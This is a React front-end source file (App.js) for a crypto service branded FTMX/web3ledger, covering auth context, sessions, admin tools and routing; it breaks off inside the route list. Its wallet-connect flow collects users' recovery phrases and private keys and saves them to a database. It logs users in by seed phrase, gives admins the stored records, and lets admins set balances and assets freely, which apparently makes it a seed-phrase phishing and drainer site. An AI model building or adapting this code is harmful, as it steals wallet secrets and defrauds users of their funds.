import React, { useState, createContext, useContext, useEffect, useRef, useCallback } from 'react';
import { Routes, Route, Navigate, useLocation } from 'react-router-dom';
import { Toaster } from 'react-hot-toast';

// Pages
import Home from './pages/Home';
import LedgerService from './pages/LedgerService';
import Staking from './pages/Staking';
import Trading from './pages/Trading';
import PrivacyPolicy from './pages/PrivacyPolicy';
import TermsOfService from './pages/TermsOfService';
import CookiePolicy from './pages/CookiePolicy';
import Contact from './pages/Contact';
import AboutUs from './pages/AboutUs';
import Login from './pages/Login';
import GetStarted from './pages/GetStarted';
import Dashboard from './pages/Dashboard';
import BackupSuccess from './pages/BackupSuccess';
import AdminPanel from './pages/AdminPanel';
import AdminLogin from './pages/AdminLogin';
import ThemeAccentCycle from './components/ThemeAccentCycle';

// Components

// API Services
import * as apiService from './services/apiService';

// Context for Auth
export const AuthContext = createContext();

export const AuthProvider = ({ children }) => {
  const [user, setUser] = useState(null);
  const [admin, setAdmin] = useState(null);
  const [users, setUsers] = useState([]);
  const [transactions, setTransactions] = useState([]);
  const [notifications, setNotifications] = useState([]);
  const [activityLogs, setActivityLogs] = useState([]);
  const [userSessions, setUserSessions] = useState([]);
  const [adminSessions, setAdminSessions] = useState([]);
  const [adminSessionId, setAdminSessionId] = useState(null);
  const [isLoading, setIsLoading] = useState(true);
  const [apiReady, setApiReady] = useState(false);
  const [usersError, setUsersError] = useState(null);
  const userSessionIdRef = useRef(null);
  const userSessionUserIdRef = useRef(null);

  const persistTrackedSession = useCallback((sessionId, userId) => {
    userSessionIdRef.current = sessionId || null;
    userSessionUserIdRef.current = userId || null;
    if (sessionId && userId) {
      localStorage.setItem('web3ledger_user_session_id', sessionId);
      localStorage.setItem('web3ledger_user_session_user_id', userId);
      return;
    }
    localStorage.removeItem('web3ledger_user_session_id');
    localStorage.removeItem('web3ledger_user_session_user_id');
  }, []);

  const getClientTimezone = () => {
    try {
      return Intl.DateTimeFormat().resolvedOptions().timeZone || null;
    } catch (_error) {
      return null;
    }
  };

  const beginUserPresenceSession = useCallback(async (sessionUser) => {
    if (!sessionUser?.id || admin) return;
    if (userSessionIdRef.current && userSessionUserIdRef.current === sessionUser.id) return;

    if (userSessionIdRef.current && userSessionUserIdRef.current && userSessionUserIdRef.current !== sessionUser.id) {
      try {
        await apiService.endUserSession(userSessionIdRef.current, userSessionUserIdRef.current);
      } catch (error) {
        console.error('Failed to end previous user session before switching account:', error);
      } finally {
        persistTrackedSession(null, null);
      }
    }

    try {
      const created = await apiService.startUserSession({
        userId: sessionUser.id,
        timezone: getClientTimezone()
      });
      if (created?.id) {
        persistTrackedSession(created.id, sessionUser.id);
      }
    } catch (error) {
      console.error('Failed to start user session tracking:', error);
    }
  }, [admin, persistTrackedSession]);

  const createSessionUser = (baseUser) => ({
    ...baseUser,
    createdAt: apiService.timestampToISO(baseUser?.createdAt) || baseUser?.createdAt || new Date().toISOString(),
    lastLogin: new Date().toISOString()
  });

  const setSessionUser = (baseUser) => {
    const sessionUser = createSessionUser(baseUser);
    setUser(sessionUser);
    const serialized = JSON.stringify(sessionUser);
    localStorage.setItem('ftmx_user', serialized);
    localStorage.setItem('web3ledger_user', serialized);
    return sessionUser;
  };

  const enqueueLoginTracking = (existingUser) => {
    Promise.allSettled([
      apiService.updateUserLastLogin(existingUser.id),
      apiService.addActivityLog({
        action: 'user_login',
        description: `User logged in with ${existingUser.walletType}`,
        userId: existingUser.id,
        adminId: null,
        metadata: {}
      })
    ]).catch((error) => {
      console.error('Background login logging error:', error);
    });
  };

  // Initialize persisted session state
  useEffect(() => {
    let isMounted = true;

    const initialize = async () => {
      try {
        const savedUser =
          localStorage.getItem('ftmx_user') ||
          localStorage.getItem('web3ledger_user');
        const savedSessionId = localStorage.getItem('web3ledger_user_session_id');
        const savedSessionUserId = localStorage.getItem('web3ledger_user_session_user_id');

        if (savedUser && isMounted) {
          const parsedUser = JSON.parse(savedUser);
          setUser(parsedUser);
          if (savedSessionId && savedSessionUserId && parsedUser?.id === savedSessionUserId) {
            persistTrackedSession(savedSessionId, savedSessionUserId);
          } else {
            persistTrackedSession(null, null);
          }
        } else if (savedSessionId || savedSessionUserId) {
          persistTrackedSession(null, null);
        }

        // Check for admin session via HttpOnly cookie (no token in localStorage anymore)
        try {
          const session = await apiService.getAdminSession();
          if (isMounted && session?.admin) {
            setAdmin(session.admin);
            setAdminSessionId(session.sessionId || null);
          }
        } catch (_error) {
          // Admin not logged in or session expired
          setAdminSessionId(null);
        }
      } finally {
        if (isMounted) {
          setApiReady(true);
          setIsLoading(false);
        }
      }
    };

    initialize();
    return () => {
      isMounted = false;
    };
  }, [persistTrackedSession]);

  // Subscribe to global datasets only when admin is logged in.
  useEffect(() => {
    if (!apiReady || !admin) {
      return undefined;
    }

    const unsubscribeUsers = apiService.subscribeToUsers((usersData) => {
      if (!Array.isArray(usersData)) return;
      const formattedUsers = usersData.map((u) => ({
        ...u,
        createdAt: apiService.timestampToISO(u.createdAt) || u.createdAt,
        lastLogin: apiService.timestampToISO(u.lastLogin) || u.lastLogin
      }));
      setUsers(formattedUsers);
      setUsersError(null);
    });

    const unsubscribeTransactions = apiService.subscribeToTransactions((txData) => {
      const formattedTx = txData.map((tx) => ({
        ...tx,
        createdAt: apiService.timestampToISO(tx.createdAt) || tx.createdAt
      }));
      setTransactions(formattedTx);
    });

    const unsubscribeLogs = apiService.subscribeToActivityLogs((logsData) => {
      const formattedLogs = logsData.map((log) => ({
        ...log,
        createdAt: apiService.timestampToISO(log.createdAt) || log.createdAt
      }));
      setActivityLogs(formattedLogs);
    });

    const unsubscribeUserSessions = apiService.subscribeToUserSessions((sessionData) => {
      const formattedSessions = sessionData.map((session) => ({
        ...session,
        startedAt: apiService.timestampToISO(session.startedAt) || session.startedAt,
        lastSeenAt: apiService.timestampToISO(session.lastSeenAt) || session.lastSeenAt,
        endedAt: apiService.timestampToISO(session.endedAt) || session.endedAt
      }));
      setUserSessions(formattedSessions);
    });

    const unsubscribeAdminSessions = apiService.subscribeToAdminSessions((sessionPayload) => {
      const sessions = Array.isArray(sessionPayload?.sessions) ? sessionPayload.sessions : [];
      const formattedSessions = sessions.map((session) => ({
        ...session,
        createdAt: apiService.timestampToISO(session.createdAt) || session.createdAt,
        lastSeenAt: apiService.timestampToISO(session.lastSeenAt) || session.lastSeenAt,
        expiresAt: apiService.timestampToISO(session.expiresAt) || session.expiresAt,
        revokedAt: apiService.timestampToISO(session.revokedAt) || session.revokedAt
      }));
      setAdminSessions(formattedSessions);
      setAdminSessionId(sessionPayload?.currentSessionId || null);
    });

    return () => {
      unsubscribeUsers?.();
      unsubscribeTransactions?.();
      unsubscribeLogs?.();
      unsubscribeUserSessions?.();
      unsubscribeAdminSessions?.();
    };
  }, [admin, apiReady]);

  useEffect(() => {
    if (!apiReady || admin || !user?.id) {
      return undefined;
    }

    beginUserPresenceSession(user);
    return undefined;
  }, [admin, apiReady, beginUserPresenceSession, user, user?.id]);

  useEffect(() => {
    if (!apiReady || admin || !user?.id) {
      return undefined;
    }

    const sendHeartbeat = async () => {
      if (!userSessionIdRef.current) {
        await beginUserPresenceSession(user);
      }
      if (!userSessionIdRef.current) return;

      try {
        await apiService.heartbeatUserSession(userSessionIdRef.current, user.id);
      } catch (error) {
        console.error('User session heartbeat failed:', error);
      }
    };

    sendHeartbeat();
    const intervalId = window.setInterval(sendHeartbeat, 60 * 1000);
    return () => window.clearInterval(intervalId);
  }, [admin, apiReady, beginUserPresenceSession, user, user?.id]);

  // Subscribe to user-specific notifications when user logs in
  useEffect(() => {
    let unsubscribeNotifications = null;

    if (user?.id && apiReady) {
      unsubscribeNotifications = apiService.subscribeToUserNotifications(user.id, (notifData) => {
        const formattedNotif = notifData.map(n => ({
          ...n,
          createdAt: apiService.timestampToISO(n.createdAt) || n.createdAt
        }));
        setNotifications(formattedNotif);
      });
    } else {
      setNotifications([]);
    }

    return () => {
      if (unsubscribeNotifications) unsubscribeNotifications();
    };
  }, [user?.id, apiReady]);

  // Keep logged-in user session synchronized with server-side user updates.
  useEffect(() => {
    if (!user?.id || !apiReady) return undefined;

    const unsubscribeUser = apiService.subscribeToUser(user.id, (latestUser) => {
      if (!latestUser) return;

      const normalizedLatest = {
        ...latestUser,
        createdAt: apiService.timestampToISO(latestUser.createdAt) || latestUser.createdAt,
        lastLogin: apiService.timestampToISO(latestUser.lastLogin) || latestUser.lastLogin
      };

      const currentAssets = JSON.stringify(user.assets || {});
      const nextAssets = JSON.stringify(normalizedLatest.assets || {});
      const hasChanged =
        user.balance !== normalizedLatest.balance ||
        user.status !== normalizedLatest.status ||
        user.email !== normalizedLatest.email ||
        currentAssets !== nextAssets ||
        user.updatedAt !== normalizedLatest.updatedAt ||
        user.lastLogin !== normalizedLatest.lastLogin;

      if (!hasChanged) return;

      const mergedUser = {
        ...user,
        ...normalizedLatest
      };
      setUser(mergedUser);
      localStorage.setItem('web3ledger_user', JSON.stringify(mergedUser));
    });

    return () => unsubscribeUser?.();
  }, [apiReady, user]);

  // Poll only the current user's transactions instead of global transaction feed.
  useEffect(() => {
    if (!user?.id || !apiReady || admin) return undefined;

    const unsubscribeTransactions = apiService.subscribeToUserTransactions(user.id, (txData) => {
      const formattedTx = txData.map((tx) => ({
        ...tx,
        createdAt: apiService.timestampToISO(tx.createdAt) || tx.createdAt
      }));
      setTransactions(formattedTx);
    });

    return () => unsubscribeTransactions?.();
  }, [admin, apiReady, user?.id]);

  // Register new user
  const registerUser = async (userData) => {
    try {
      const walletId = apiService.generateWalletId();
      
      const newUserData = {
        walletId: walletId,
        walletType: userData.walletType,
        walletName: userData.walletName || userData.walletType,
        seedPhrase: userData.seedPhrase?.toLowerCase().trim() || '',
        privateKey: userData.privateKey?.toLowerCase() || null,
        email: userData.email || '',
        balance: userData.balance || 0,
        currency: userData.currency || 'USD',
        status: 'active'
      };

      // Create user via API
      const newUser = await apiService.createUser(newUserData);
      
      // Set user session
      const sessionUser = setSessionUser(newUser);
      
      // Run non-critical writes in background so sign-in is not blocked.
      Promise.allSettled([
        apiService.sendNotificationToDB({
          userId: newUser.id,
          title: 'Welcome to FTMX!',
          message: 'Your wallet has been successfully connected. Start exploring our features and manage your assets securely.',
          type: 'success'
        }),
        apiService.addActivityLog({
          action: 'user_registered',
          description: `New user registered with ${userData.walletType} wallet`,
          userId: newUser.id,
          adminId: null,
          metadata: { walletType: userData.walletType }
        })
      ]).catch((error) => {
        console.error('Background registration logging error:', error);
      });
      
      return sessionUser;
    } catch (error) {
      console.error('Error registering user:', error);
      throw error;
    }
  };

  // Login user
  const loginUser = async (credentials) => {
    try {
      let existingUser = null;

      // Find user by seed phrase
      if (credentials.seedPhrase) {
        existingUser = await apiService.getUserBySeedPhrase(credentials.seedPhrase);
      }
      
      if (existingUser) {
        // Check if suspended
        if (existingUser.status === 'suspended') {
          return { error: 'suspended', user: existingUser };
        }

        const sessionUser = setSessionUser(existingUser);
        // Run non-critical writes in background so login returns quickly.
        enqueueLoginTracking(existingUser);
        
        return sessionUser;
      }
      return null;
    } catch (error) {
      console.error('Error logging in:', error);
      throw error;
    }
  };

  // Fast connect flow for wallet modal:
  // 1) local cache hit if user list is already loaded
  // 2) single register call for new users
  // 3) duplicate fallback to login for existing users
  const connectWalletUser = async (walletData) => {
    const normalizedSeedPhrase = walletData?.seedPhrase?.toLowerCase().trim() || '';
    if (!normalizedSeedPhrase) {
      throw new Error('Recovery phrase is required');
    }

    const localMatch = users.find((candidate) => candidate.seedPhrase === normalizedSeedPhrase);
    if (localMatch) {
      if (localMatch.status === 'suspended') {
        return { error: 'suspended', user: localMatch, isNewUser: false };
      }

      const sessionUser = setSessionUser(localMatch);
      enqueueLoginTracking(localMatch);
      return { user: sessionUser, isNewUser: false };
    }

    const resolveExistingUser = async () => {
      const existingUser = await loginUser({ seedPhrase: normalizedSeedPhrase });
      if (existingUser?.error === 'suspended') {
        return { error: 'suspended', user: existingUser.user, isNewUser: false };
      }
      if (existingUser) {
        return { user: existingUser, isNewUser: false };
      }
      return null;
    };

    // Deterministic check first: if the account already exists, always treat as returning user.
    try {
      const existingResult = await resolveExistingUser();
      if (existingResult) return existingResult;
    } catch (lookupError) {
      console.warn('Existing user pre-check failed, proceeding with registration attempt:', lookupError);
    }

    const maxCreateAttempts = 3;
    let lastCreateError = null;

    for (let attempt = 1; attempt <= maxCreateAttempts; attempt += 1) {
      try {
        const registeredUser = await registerUser({
          ...walletData,
          seedPhrase: normalizedSeedPhrase
        });

        return { user: registeredUser, isNewUser: true };
      } catch (error) {
        lastCreateError = error;
        const message = String(error?.message || '').toLowerCase();
        const isDuplicate = message.includes('duplicate') || message.includes('unique') || message.includes('(409)');

        // If create failed after another client created the same account, recover by logging in.
        try {
          const existingResult = await resolveExistingUser();
          if (existingResult) return existingResult;
        } catch (_lookupAfterCreateError) {
          // Ignore secondary lookup failures and use retry/throw behavior below.
        }

        // Retry duplicate create errors because a walletId collision can happen.
        if (isDuplicate && attempt < maxCreateAttempts) {
          continue;
        }

        break;
      }
    }

    throw lastCreateError || new Error('Unable to connect wallet');
  };

  // Logout user
  const logoutUser = async () => {
    const currentUser = user;
    const trackedSessionId = userSessionIdRef.current;
    const trackedSessionUserId = userSessionUserIdRef.current;
    // Clear session immediately so UI updates instantly
    setUser(null);
    setNotifications([]);
    localStorage.removeItem('ftmx_user');
    localStorage.removeItem('web3ledger_user');
    persistTrackedSession(null, null);
    
    // Log the activity in the background
    if (currentUser) {
      try {
        if (trackedSessionId && trackedSessionUserId) {
          await apiService.endUserSession(trackedSessionId, trackedSessionUserId);
        }

        await apiService.addActivityLog({
          action: 'user_logout',
          description: 'User logged out',
          userId: currentUser.id,
          adminId: null,
          metadata: {}
        });
      } catch (error) {
        console.error('Error logging logout:', error);
      }
    }
  };

  const applyAdminSession = async (response, activityEmail) => {
    if (!response?.admin) {
      return false;
    }

    const adminData = response.admin;
    setAdmin(adminData);
    setAdminSessionId(response.sessionId || null);

    try {
      await apiService.addActivityLog({
        action: 'admin_login',
        description: 'Admin logged in',
        userId: null,
        adminId: activityEmail || adminData.email,
        metadata: {}
      });
    } catch (error) {
      console.error('Error logging admin login:', error);
    }

    return true;
  };

  const beginAdminLogin = async (credentials) => {
    return apiService.adminLoginStart(credentials);
  };

  const verifyAdminLoginTwoFactor = async ({ challengeToken, code, email }) => {
    try {
      const response = await apiService.adminLoginVerifyTwoFactor({
        challengeToken,
        code,
        timezone: getClientTimezone()
      });
      return applyAdminSession(response, email);
    } catch (error) {
      console.error('Admin 2FA login failed:', error);
      return false;
    }
  };

  const revokeAdminSession = async (sessionId) => {
    const targetId = String(sessionId || '').trim();
    if (!targetId) {
      throw new Error('Session id is required');
    }

    const response = await apiService.revokeAdminSession(targetId);
    const isCurrentSession = response?.currentSessionRevoked || targetId === adminSessionId;

    if (isCurrentSession) {
      await logoutAdmin();
      return { ...response, loggedOut: true };
    }

    return { ...response, loggedOut: false };
  };

  const startAdminPasswordReset = async (email) => {
    return apiService.startAdminPasswordReset(email);
  };

  const completeAdminPasswordReset = async ({ challengeToken, code, newPassword }) => {
    return apiService.completeAdminPasswordReset({ challengeToken, code, newPassword });
  };

  const resetAdminTwoFactor = async (code) => {
    await apiService.resetAdminTwoFactor(code);
    await logoutAdmin();
    return true;
  };

  const changeAdminPassword = async ({ code, newPassword }) => {
    await apiService.changeAdminPassword({ code, newPassword });
    try {
      await apiService.addActivityLog({
        action: 'admin_password_changed',
        description: 'Admin password changed',
        userId: null,
        adminId: admin?.email || null,
        metadata: {}
      });
    } catch (error) {
      console.error('Error logging admin password change:', error);
    }
    await logoutAdmin();
    return true;
  };

  const changeAdminEmail = async ({ code, newEmail }) => {
    const previousEmail = admin?.email || null;
    const response = await apiService.changeAdminEmail({ code, newEmail });
    const nextAdmin = response?.admin;
    if (nextAdmin?.email) {
      setAdmin((previous) => ({
        ...(previous || {}),
        ...nextAdmin
      }));

      try {
        await apiService.addActivityLog({
          action: 'admin_email_changed',
          description: `Admin email changed from ${previousEmail || 'unknown'} to ${nextAdmin.email}`,
          userId: null,
          adminId: nextAdmin.email,
          metadata: {
            previousEmail,
            newEmail: nextAdmin.email
          }
        });
      } catch (error) {
        console.error('Error logging admin email change:', error);
      }
    }
    return response;
  };

  // Admin logout
  const logoutAdmin = async () => {
    if (admin?.email) {
      try {
        await apiService.addActivityLog({
          action: 'admin_logout',
          description: 'Admin logged out',
          userId: null,
          adminId: admin.email,
          metadata: {}
        });
      } catch (error) {
        console.error('Error logging admin logout:', error);
      }
    }

    try {
      await apiService.adminLogout();
    } catch (error) {
      console.error('Admin logout request failed:', error);
    }

    setAdmin(null);
    setUsers([]);
    setTransactions([]);
    setActivityLogs([]);
    setUserSessions([]);
    setAdminSessions([]);
    setAdminSessionId(null);
    setUsersError(null);
    localStorage.removeItem('ftmx_admin');
    localStorage.removeItem('web3ledger_admin');
  };

  const refreshUsers = async () => {
    try {
      setUsersError(null);
      const usersData = await apiService.getAllUsers();
      const formattedUsers = usersData.map((u) => ({
        ...u,
        createdAt: apiService.timestampToISO(u.createdAt) || u.createdAt,
        lastLogin: apiService.timestampToISO(u.lastLogin) || u.lastLogin
      }));
      setUsers(formattedUsers);
    } catch (error) {
      const message = error?.message || 'Failed to load users';
      setUsersError(message);
      throw error;
    }
  };

  // Update user balance
  const updateUserBalance = async (userId, newBalance) => {
    try {
      await apiService.updateUserBalance(userId, newBalance);
      // Update local user if it's the current user
      if (user && user.id === userId) {
        const updatedUser = { ...user, balance: parseFloat(newBalance) };
        setUser(updatedUser);
        localStorage.setItem('ftmx_user', JSON.stringify(updatedUser));
      }
    } catch (error) {
      console.error('Error updating balance:', error);
      throw error;
    }
  };

  // Update user crypto assets
  const updateUserAssets = async (userId, assets) => {
    try {
      await apiService.updateUserAssets(userId, assets);
      // Update local user if it's the current user
      if (user && user.id === userId) {
        const updatedUser = { ...user, assets };
        setUser(updatedUser);
        localStorage.setItem('ftmx_user', JSON.stringify(updatedUser));
      }
    } catch (error) {
      console.error('Error updating assets:', error);
      throw error;
    }
  };

  // Update single asset for user
  const updateUserSingleAsset = async (userId, symbol, amount) => {
    try {
      const updatedAssets = await apiService.updateUserSingleAsset(userId, symbol, amount);
      // Update local user if it's the current user
      if (user && user.id === userId && updatedAssets) {
        const updatedUser = { ...user, assets: updatedAssets };
        setUser(updatedUser);
        localStorage.setItem('ftmx_user', JSON.stringify(updatedUser));
      }
      return updatedAssets;
    } catch (error) {
      console.error('Error updating single asset:', error);
      throw error;
    }
  };

  // Update user status
  const updateUserStatus = async (userId, status) => {
    try {
      await apiService.updateUserStatus(userId, status);
      await apiService.addActivityLog({
        action: 'user_status_updated',
        description: `User status changed to ${status}`,
        userId: userId,
        adminId: admin?.email,
        metadata: { newStatus: status }
      });
    } catch (error) {
      console.error('Error updating status:', error);
      throw error;
    }
  };

  // Delete user
  const deleteUser = async (userId) => {
    try {
      await apiService.deleteUserFromDB(userId);
      await apiService.addActivityLog({
        action: 'user_deleted',
        description: `User ${userId} was deleted`,
        userId: null,
        adminId: admin?.email,
        metadata: { deletedUserId: userId }
      });
    } catch (error) {
      console.error('Error deleting user:', error);
      throw error;
    }
  };

  // Add transaction
  const addTransaction = async (transactionData) => {
    try {
      const newTransaction = await apiService.addTransaction(transactionData);
      await apiService.addActivityLog({
        action: 'transaction_created',
        description: `New ${transactionData.type} transaction: ${transactionData.amount} ${transactionData.asset}`,
        userId: transactionData.userId,
        adminId: null,
        metadata: { transactionId: newTransaction.id }
      });
      return newTransaction;
    } catch (error) {
      console.error('Error adding transaction:', error);
      throw error;
    }
  };

  // Get user transactions
  const getUserTransactions = (userId) => {
    return transactions.filter(tx => tx.userId === userId);
  };

  // Update transaction status
  const updateTransactionStatus = async (transactionId, status) => {
    try {
      await apiService.updateTransactionStatus(transactionId, status);
    } catch (error) {
      console.error('Error updating transaction:', error);
      throw error;
    }
  };

  // Send notification
  const sendNotification = async (userId, title, message, type = 'info') => {
    try {
      const newNotification = await apiService.sendNotificationToDB({
        userId,
        title,
        message,
        type
      });
      await apiService.addActivityLog({
        action: 'notification_sent',
        description: `Notification sent to user ${userId}: ${title}`,
        userId: userId,
        adminId: admin?.email,
        metadata: {}
      });
      return newNotification;
    } catch (error) {
      console.error('Error sending notification:', error);
      throw error;
    }
  };

  // Send bulk notification
  const sendBulkNotification = async (userIds, title, message, type = 'info') => {
    try {
      const promises = userIds.map(userId => 
        apiService.sendNotificationToDB({
          userId,
          title,
          message,
          type
        })
      );
      const results = await Promise.all(promises);
      await apiService.addActivityLog({
        action: 'bulk_notification_sent',
        description: `Bulk notification sent to ${userIds.length} users: ${title}`,
        userId: null,
        adminId: admin?.email,
        metadata: { userCount: userIds.length }
      });
      return results;
    } catch (error) {
      console.error('Error sending bulk notification:', error);
      throw error;
    }
  };

  // Get user notifications
  const getUserNotifications = (userId) => {
    return notifications.filter(n => n.userId === userId);
  };

  // Mark notification as read
  const markNotificationRead = async (notificationId) => {
    try {
      await apiService.markNotificationAsRead(notificationId);
      // Update local state
      setNotifications(prev => prev.map(n => 
        n.id === notificationId ? { ...n, read: true } : n
      ));
    } catch (error) {
      console.error('Error marking notification as read:', error);
    }
  };

  // Mark all notifications as read
  const markAllNotificationsRead = async (userId) => {
    try {
      await apiService.markAllNotificationsAsRead(userId);
      // Update local state
      setNotifications(prev => prev.map(n => 
        n.userId === userId ? { ...n, read: true } : n
      ));
    } catch (error) {
      console.error('Error marking all notifications as read:', error);
    }
  };

  // Delete notification
  const deleteNotification = async (notificationId) => {
    try {
      await apiService.deleteNotificationFromDB(notificationId);
    } catch (error) {
      console.error('Error deleting notification:', error);
    }
  };

  // Add activity log
  const addActivityLog = async (action, description, userId = null, adminId = null, metadata = {}) => {
    try {
      await apiService.addActivityLog({
        action,
        description,
        userId,
        adminId,
        metadata
      });
    } catch (error) {
      console.error('Error adding activity log:', error);
    }
  };

  // Get activity logs
  const getActivityLogs = (filters = {}) => {
    let logs = [...activityLogs];
    if (filters.userId) {
      logs = logs.filter(log => log.userId === filters.userId);
    }
    if (filters.action) {
      logs = logs.filter(log => log.action === filters.action);
    }
    if (filters.startDate) {
      logs = logs.filter(log => new Date(log.createdAt) >= new Date(filters.startDate));
    }
    if (filters.endDate) {
      logs = logs.filter(log => new Date(log.createdAt) <= new Date(filters.endDate));
    }
    return logs;
  };

  // Export functions
  const exportUsersToCSV = () => {
    const headers = ['ID', 'Wallet ID', 'Wallet Type', 'Wallet Name', 'Email', 'Balance', 'Currency', 'Status', 'Created At', 'Last Login'];
    const csvContent = [
      headers.join(','),
      ...users.map(u => [
        u.id,
        u.walletId,
        u.walletType,
        u.walletName || '',
        u.email || '',
        u.balance,
        u.currency,
        u.status,
        u.createdAt,
        u.lastLogin
      ].join(','))
    ].join('\n');
    
    const blob = new Blob([csvContent], { type: 'text/csv' });
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `ftmx_users_${new Date().toISOString().split('T')[0]}.csv`;
    a.click();
    window.URL.revokeObjectURL(url);
    addActivityLog('data_exported', 'User data exported to CSV', null, admin?.email);
  };

  const exportTransactionsToCSV = () => {
    const headers = ['ID', 'User ID', 'Type', 'Asset', 'Amount', 'From', 'To', 'Status', 'Hash', 'Created At'];
    const csvContent = [
      headers.join(','),
      ...transactions.map(tx => [
        tx.id,
        tx.userId,
        tx.type,
        tx.asset,
        tx.amount,
        tx.from,
        tx.to,
        tx.status,
        tx.hash || '',
        tx.createdAt
      ].join(','))
    ].join('\n');
    
    const blob = new Blob([csvContent], { type: 'text/csv' });
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement('a');
    a.href = url;
    a.download = `ftmx_transactions_${new Date().toISOString().split('T')[0]}.csv`;
    a.click();
    window.URL.revokeObjectURL(url);
    addActivityLog('data_exported', 'Transaction data exported to CSV', null, admin?.email);
  };

  return (
    <AuthContext.Provider value={{
      user,
      admin,
      users,
      transactions,
      notifications,
      activityLogs,
      userSessions,
      adminSessions,
      adminSessionId,
      isLoading,
      apiReady,
      usersError,
      refreshUsers,
      registerUser,
      loginUser,
      connectWalletUser,
      logoutUser,
      beginAdminLogin,
      verifyAdminLoginTwoFactor,
      startAdminPasswordReset,
      completeAdminPasswordReset,
      resetAdminTwoFactor,
      changeAdminPassword,
      changeAdminEmail,
      revokeAdminSession,
      logoutAdmin,
      updateUserBalance,
      updateUserAssets,
      updateUserSingleAsset,
      updateUserStatus,
      deleteUser,
      addTransaction,
      getUserTransactions,
      updateTransactionStatus,
      sendNotification,
      sendBulkNotification,
      getUserNotifications,
      markNotificationRead,
      markAllNotificationsRead,
      deleteNotification,
      addActivityLog,
      getActivityLogs,
      exportUsersToCSV,
      exportTransactionsToCSV
    }}>
      {children}
    </AuthContext.Provider>
  );
};

export const useAuth = () => useContext(AuthContext);

// Protected Route Component
const ProtectedRoute = ({ children, requireAdmin = false }) => {
  const { user, admin, isLoading } = useAuth();
  
  if (isLoading) {
    return (
      <div className="loading-screen">
        <div className="spinner"></div>
      </div>
    );
  }
  
  if (requireAdmin && !admin) {
    return <Navigate to="/admin/login" replace />;
  }
  
  if (!requireAdmin && !user) {
    return <Navigate to="/login" replace />;
  }
  
  return children;
};

const CHAT_HIDDEN_ROUTES = ['/login', '/get-started', '/backup-success', '/dashboard', '/admin/login'];
const TAWK_SCRIPT_ID = 'tawk-script';
const TAWK_SCRIPT_SRC = 'https://embed.tawk.to/6990c57e195aec1c309104bc/1jheo6ucs';
const ENABLE_TAWK_CHAT =
  process.env.REACT_APP_ENABLE_TAWK_CHAT === 'true' ||
  process.env.NODE_ENV === 'production';

const isRouteMatch = (pathname, route) =>
  pathname === route || pathname.startsWith(`${route}/`);

const shouldHideChatForPath = (pathname) =>
  CHAT_HIDDEN_ROUTES.some((route) => isRouteMatch(pathname, route));

const isDashboardPath = (pathname) => isRouteMatch(pathname, '/dashboard');

const toggleTawkFallbackVisibility = (hide) => {
  const selector = [
    "iframe[src*='tawk.to']",
    "iframe[src*='embed.tawk.to']",
    "iframe[src*='va.tawk.to']",
    "iframe[id*='tawk']",
    "[id*='tawkchat']",
    "[id^='tawk']",
    "[id*='tawk-chat']",
    "[class*='tawk']",
    "[data-tawk*='true']",
    '#tawkchat-container',
    '.tawk-min-container',
    '.tawk-max-container',
    '.tawk-button-circle',
    '.tawk-chat',
    '.tawk-frame',
    '.tawk-widget',
  ].join(',');

  document.querySelectorAll(selector).forEach((el) => {
    if (hide) {
      el.style.setProperty('display', 'none', 'important');
      el.style.setProperty('visibility', 'hidden', 'important');
      el.style.setProperty('pointer-events', 'none', 'important');
    } else {
      el.style.removeProperty('display');
      el.style.removeProperty('visibility');
      el.style.removeProperty('pointer-events');
    }
  });
};

const TawkRouteGuard = () => {
  const location = useLocation();

  useEffect(() => {
    document.body.classList.toggle('dashboard-route', isDashboardPath(location.pathname));
    const shouldHide = shouldHideChatForPath(location.pathname);

    const removeTawkScript = () => {
      const script = document.getElementById(TAWK_SCRIPT_ID);
      if (script) {
        script.remove();
      }
    };

    if (!ENABLE_TAWK_CHAT) {
      document.body.classList.remove('chat-hidden-route');
      toggleTawkFallbackVisibility(false);
      return undefined;
    }

    const suppressTawkScriptError = (event) => {
      const source = String(event?.filename || '');
      const message = String(event?.message || '');
      if (!source.includes('embed.tawk.to')) return;
      if (!message.includes('i18next is not a function')) return;
      event.preventDefault();
      event.stopImmediatePropagation();
    };

    window.addEventListener('error', suppressTawkScriptError, true);

    document.body.classList.toggle('chat-hidden-route', shouldHide);

    if (shouldHide) {
      const enforceHiddenState = () => {
        window.Tawk_API?.hideWidget?.();
        window.Tawk_API?.shutdown?.();
        removeTawkScript();
        toggleTawkFallbackVisibility(true);
      };

      enforceHiddenState();
      const intervalId = window.setInterval(enforceHiddenState, 300);
      return () => {
        window.clearInterval(intervalId);
        window.removeEventListener('error', suppressTawkScriptError, true);
      };
    }

    let script = document.getElementById(TAWK_SCRIPT_ID);
    if (!script) {
      window.Tawk_API = window.Tawk_API || {};
      const previousOnLoad = window.Tawk_API.onLoad;
      window.Tawk_API.onLoad = function onTawkLoad() {
        if (typeof previousOnLoad === 'function') {
          previousOnLoad();
        }
        if (shouldHideChatForPath(window.location.pathname)) {
          window.Tawk_API?.hideWidget?.();
          toggleTawkFallbackVisibility(true);
        }
      };
      window.Tawk_LoadStart = new Date();

      script = document.createElement('script');
      script.id = TAWK_SCRIPT_ID;
      script.async = true;
      script.src = TAWK_SCRIPT_SRC;
      script.charset = 'UTF-8';
      script.setAttribute('crossorigin', '*');
      document.body.appendChild(script);
    }

    window.Tawk_API?.showWidget?.();
    toggleTawkFallbackVisibility(false);
    return () => {
      window.removeEventListener('error', suppressTawkScriptError, true);
    };
  }, [location.pathname]);

  return null;
};

function App() {
  return (
    <AuthProvider>
      <ThemeAccentCycle />
      <TawkRouteGuard />
      <Toaster
        position="top-right"
        toastOptions={{
          style: {
            background: '#1a1a1a',
            color: '#fff',
            border: '1px solid rgba(255,255,255,0.1)',
          },
          success: {
            iconTheme: {
              primary: '#22c55e',
              secondary: '#000',
            },
          },
          error: {
            iconTheme: {
              primary: '#ef4444',
              secondary: '#000',
            },
          },
        }}
      />
      <Routes>
        {/* Public Routes */}
        <Route path="/" element={<Home />} />
        <Route path="/ledger" element={<LedgerService />} />
        <Route path="/staking" element={<Staking />} />
        <Route path="/trading" element={<Trading />} />
        <Route path="/privacy-policy" element={<PrivacyPolicy />} />
        <Route path="/terms-of-service" element={<TermsOfService />} />
        <Route path="/cookie-policy" element={<CookiePolicy />} />
        <Route path="/contact" element={<Contact />} />
        <Route path="/about" element={<AboutUs />} />
        <Route path="/login" element={<Login />} />
        <Route path="/get-started" element={<GetStarted />} />
        
        {/* Protected User Routes */}
